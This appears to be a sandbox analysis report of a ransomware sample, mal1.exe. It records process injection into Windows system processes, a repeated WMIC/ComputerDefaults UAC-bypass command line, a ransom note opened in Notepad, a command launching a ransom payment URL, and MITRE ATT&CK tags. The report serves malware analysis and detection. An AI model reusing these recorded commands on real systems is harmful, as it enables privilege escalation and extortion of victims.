Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeShutdownPrivilege	3004	Explorer.EXE
Token: SeCreatePagefilePrivilege	3004	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	3720	WMIC.exe
Token: SeSecurityPrivilege	3720	WMIC.exe
Token: SeTakeOwnershipPrivilege	3720	WMIC.exe
Token: SeLoadDriverPrivilege	3720	WMIC.exe
Token: SeSystemProfilePrivilege	3720	WMIC.exe
Token: SeSystemtimePrivilege	3720	WMIC.exe
Token: SeProfSingleProcessPrivilege	3720	WMIC.exe
Token: SeIncBasePriorityPrivilege	3720	WMIC.exe
Token: SeCreatePagefilePrivilege	3720	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
636	notepad.exe

Suspicious use of SetWindowsHookEx 18 IoCs

pid	Process
3004	Explorer.EXE
2472	MicrosoftEdge.exe
4720	MicrosoftEdgeCP.exe
4720	MicrosoftEdgeCP.exe
3004	Explorer.EXE
3816	MicrosoftEdgeCP.exe
3004	Explorer.EXE
3004	Explorer.EXE
3004	Explorer.EXE
3004	Explorer.EXE
3004	Explorer.EXE
3004	Explorer.EXE
3004	Explorer.EXE
3004	Explorer.EXE
3004	Explorer.EXE
3004	Explorer.EXE
3004	Explorer.EXE
3004	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2348 wrote to memory of 636	2348	sihost.exe	70
PID 2348 wrote to memory of 636	2348	sihost.exe	70
PID 2348 wrote to memory of 2232	2348	sihost.exe	71
PID 2348 wrote to memory of 2232	2348	sihost.exe	71
PID 2348 wrote to memory of 2944	2348	sihost.exe	73
PID 2348 wrote to memory of 2944	2348	sihost.exe	73
PID 2348 wrote to memory of 360	2348	sihost.exe	75
PID 2348 wrote to memory of 360	2348	sihost.exe	75
PID 2372 wrote to memory of 1252	2372	svchost.exe	77
PID 2372 wrote to memory of 1252	2372	svchost.exe	77
PID 2372 wrote to memory of 724	2372	svchost.exe	79
PID 2372 wrote to memory of 724	2372	svchost.exe	79
PID 3004 wrote to memory of 1704	3004	Explorer.EXE	82
PID 3004 wrote to memory of 1704	3004	Explorer.EXE	82
PID 3004 wrote to memory of 664	3004	Explorer.EXE	83
PID 3004 wrote to memory of 664	3004	Explorer.EXE	83
PID 2720 wrote to memory of 2412	2720	taskhostw.exe	86
PID 2720 wrote to memory of 2412	2720	taskhostw.exe	86
PID 2720 wrote to memory of 1456	2720	taskhostw.exe	87
PID 2720 wrote to memory of 1456	2720	taskhostw.exe	87
PID 2944 wrote to memory of 3196	2944	cmd.exe	90
PID 2944 wrote to memory of 3196	2944	cmd.exe	90
PID 360 wrote to memory of 3720	360	cmd.exe	91
PID 360 wrote to memory of 3720	360	cmd.exe	91
PID 724 wrote to memory of 1164	724	cmd.exe	92
PID 724 wrote to memory of 1164	724	cmd.exe	92
PID 1252 wrote to memory of 1368	1252	cmd.exe	93
PID 1252 wrote to memory of 1368	1252	cmd.exe	93
PID 3472 wrote to memory of 2072	3472	RuntimeBroker.exe	94
PID 3472 wrote to memory of 2072	3472	RuntimeBroker.exe	94
PID 3472 wrote to memory of 2100	3472	RuntimeBroker.exe	95
PID 3472 wrote to memory of 2100	3472	RuntimeBroker.exe	95
PID 1704 wrote to memory of 1392	1704	cmd.exe	99
PID 1704 wrote to memory of 1392	1704	cmd.exe	99
PID 2708 wrote to memory of 3900	2708	mal1.exe	98
PID 2708 wrote to memory of 3900	2708	mal1.exe	98
PID 2708 wrote to memory of 2240	2708	mal1.exe	100
PID 2708 wrote to memory of 2240	2708	mal1.exe	100
PID 1456 wrote to memory of 3780	1456	cmd.exe	101
PID 1456 wrote to memory of 3780	1456	cmd.exe	101
PID 664 wrote to memory of 3680	664	cmd.exe	103
PID 664 wrote to memory of 3680	664	cmd.exe	103
PID 2412 wrote to memory of 2024	2412	cmd.exe	105
PID 2412 wrote to memory of 2024	2412	cmd.exe	105
PID 2072 wrote to memory of 2124	2072	cmd.exe	107
PID 2072 wrote to memory of 2124	2072	cmd.exe	107
PID 2100 wrote to memory of 1564	2100	cmd.exe	108
PID 2100 wrote to memory of 1564	2100	cmd.exe	108
PID 2240 wrote to memory of 3252	2240	cmd.exe	109
PID 2240 wrote to memory of 3252	2240	cmd.exe	109
PID 3900 wrote to memory of 3760	3900	cmd.exe	110
PID 3900 wrote to memory of 3760	3900	cmd.exe	110
PID 4100 wrote to memory of 4600	4100	cmd.exe	135
PID 4100 wrote to memory of 4600	4100	cmd.exe	135
PID 4172 wrote to memory of 4628	4172	cmd.exe	146
PID 4172 wrote to memory of 4628	4172	cmd.exe	146
PID 4132 wrote to memory of 4640	4132	cmd.exe	145
PID 4132 wrote to memory of 4640	4132	cmd.exe	145
PID 4116 wrote to memory of 4652	4116	cmd.exe	144
PID 4116 wrote to memory of 4652	4116	cmd.exe	144
PID 4164 wrote to memory of 4664	4164	cmd.exe	143
PID 4164 wrote to memory of 4664	4164	cmd.exe	143
PID 3528 wrote to memory of 4676	3528	cmd.exe	142
PID 3528 wrote to memory of 4676	3528	cmd.exe	142

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3004
- C:\Users\Admin\AppData\Local\Temp\mal1.exe
  "C:\Users\Admin\AppData\Local\Temp\mal1.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3900
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:3760
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2240
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:3252
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1704
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1392
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:664
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3680

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3700
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3700 -s 724
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1492

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3472
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2072
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2124
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2100
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1564

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious use of WriteProcessMemory
PID:2720
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2412
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2024
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1456
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3780

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
- Suspicious use of WriteProcessMemory
PID:2372
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1252
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1368
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:724
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1164

c:\windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Suspicious use of WriteProcessMemory
PID:2348
- \??\c:\windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  - Suspicious use of FindShellTrayWindow
  PID:636
- \??\c:\windows\system32\cmd.exe
  cmd /c "start http://029cfc0002783ee0beltalkfzj.jobsbig.cam/eltalkfzj^&1^&47006090^&79^&291^&2215063"
  2⤵
  - Checks computer location settings
  PID:2232
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2944
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3196
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:360
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3720

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4152
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4756

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4140
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4712

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4180
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4764

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4172
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4628

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4164
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4664

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4116
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4652

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4132
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4640

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4124
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4780

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4108
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4700

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4100
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4600

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3528
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4676

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:612
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4688

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2472

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:2712

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4720

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:4772

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:1760

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2992

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3816

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2444

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2348-127-0x000002AAC4300000-0x000002AAC4304000-memory.dmp

Filesize
16KB

Download
memory/2708-126-0x000001D925E40000-0x000001D925E41000-memory.dmp

Filesize
4KB

Download
memory/2708-115-0x000001D923D50000-0x000001D923D56000-memory.dmp

Filesize
24KB

Download
memory/2708-124-0x000001D925E20000-0x000001D925E21000-memory.dmp

Filesize
4KB

Download
memory/2708-125-0x000001D925E30000-0x000001D925E31000-memory.dmp

Filesize
4KB

Download
memory/2708-149-0x000001D926440000-0x000001D926441000-memory.dmp

Filesize
4KB

Download
memory/2708-117-0x000001D925750000-0x000001D925751000-memory.dmp

Filesize
4KB

Download
memory/2708-116-0x000001D925740000-0x000001D925741000-memory.dmp

Filesize
4KB

Download
memory/2708-119-0x000001D925770000-0x000001D925771000-memory.dmp

Filesize
4KB

Download
memory/2708-121-0x000001D925DD0000-0x000001D925DD1000-memory.dmp

Filesize
4KB

Download
memory/2708-118-0x000001D925760000-0x000001D925761000-memory.dmp

Filesize
4KB

Download
memory/2708-123-0x000001D925E10000-0x000001D925E11000-memory.dmp

Filesize
4KB

Download
memory/2708-122-0x000001D925DE0000-0x000001D925DE1000-memory.dmp

Filesize
4KB

Download
memory/2708-120-0x000001D925DC0000-0x000001D925DC1000-memory.dmp

Filesize
4KB

Download